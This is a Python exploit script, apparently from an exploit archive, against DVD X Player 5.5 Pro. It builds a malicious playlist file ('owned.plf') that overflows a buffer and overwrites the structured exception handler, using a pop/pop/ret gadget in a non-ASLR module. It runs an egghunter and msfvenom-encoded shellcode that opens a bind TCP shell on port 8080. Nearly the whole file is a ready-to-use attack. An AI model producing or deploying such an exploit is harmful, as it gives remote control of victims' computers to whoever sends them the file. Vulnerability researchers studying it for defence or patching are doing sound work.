# DVD X Player 5.5 Pro # Bypass ASLR by using non-aslr enabled module # SEH Overwrite # Egghunter is not needed as there is at least 2000 bytes for shellcode
import sys
print "====================================" print "DVD X Player 5.5 Pro Buffer Overflow" print " SEH Overwrite - Bypass ASLR " print " Written by Blake " print "===================================="
# size = 325 bytes # ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c shellcode=( "\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" "\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71" "\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32" "\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33" "\xb0\x3a\x69\x4e\xe5\x9c\x50\x81\xf8\xdd\x95\xfc\xf3\x8f\x4e" "\x8a\xa6\x3f\xfa\xce\x7a\x3e\x2c\x45\xc2\x38\x49\x9a\xb7\xf2" "\x50\xcb\x68\x89\x1b\xf3\x03\xd5\xbb\x02\xc7\x06\x87\x4d\x6c" "\xfc\x73\x4c\xa4\xcd\x7c\x7e\x88\x81\x42\x4e\x05\xd8\x83\x69" "\xf6\xaf\xff\x89\x8b\xb7\x3b\xf3\x57\x32\xde\x53\x13\xe4\x3a" "\x65\xf0\x72\xc8\x69\xbd\xf1\x96\x6d\x40\xd6\xac\x8a\xc9\xd9" "\x62\x1b\x89\xfd\xa6\x47\x49\x9c\xff\x2d\x3c\xa1\xe0\x8a\xe1" "\x07\x6a\x38\xf5\x31\x31\x55\x3a\x0f\xca\xa5\x54\x18\xb9\x97" "\xfb\xb2\x55\x94\x74\x1c\xa1\xdb\xae\xd8\x3d\x22\x51\x18\x17" "\xe1\x05\x48\x0f\xc0\x25\x03\xcf\xed\xf3\x83\x9f\x41\xac\x63" "\x70\x22\x1c\x0b\x9a\xad\x43\x2b\xa5\x67\xec\x9a\x81\xdb\x7b" "\xde\x35\xc3\xeb\x57\xd3\x91\x1b\x31\x4b\x0e\xde\x66\x44\xa9" "\x21\x4d\xf8\x62\xb6\xda\x16\xb4\xb9\xdb\x3c\x96\x16\x74\xd7" "\x6d\x75\x41\xc6\x71\x50\xe2\x9f\xe6\x2e\x62\xed\x97\x2f\xaf" "\x87\x57\xba\x4b\x0e\x0f\x52\x51\x77\x67\xfd\xaa\x52\xf3\x34" "\x3e\x1d\x6c\x39\xae\x9d\x6c\x6f\xa4\x9d\x04\xd7\x9c\xcd\x31" "\x18\x09\x62\xea\x8d\xb1\xd3\x5e\x05\xd9\xd9\xb9\x61\x46\x21" "\xec\x73\xbb\xf4\xc9\xf1\xcd\x72\x3a\x3a")
# 32 byte egghunter egghunter =( "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" "\x54\x30\x30\x57" # egg - W00T "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
# overwrite EIP = 260 bytes # overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]
egg = "\x54\x30\x30\x57\x54\x30\x30\x57" buffer = "\x41" * 608 next_seh = "\xeb\x06\x90\x90" # jump forward 6 bytes seh = "\xdb\x2a\x60\x61" # pop/pop/ret nops = "\x90" * 20
print "[+] Creating malicious plf" try: file = open("owned.plf","w") file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode) file.close() print "[+] File created successfully" raw_input("[+] Press any key to exit") except: print "[X] Error creating file!" sys.exit(0)
|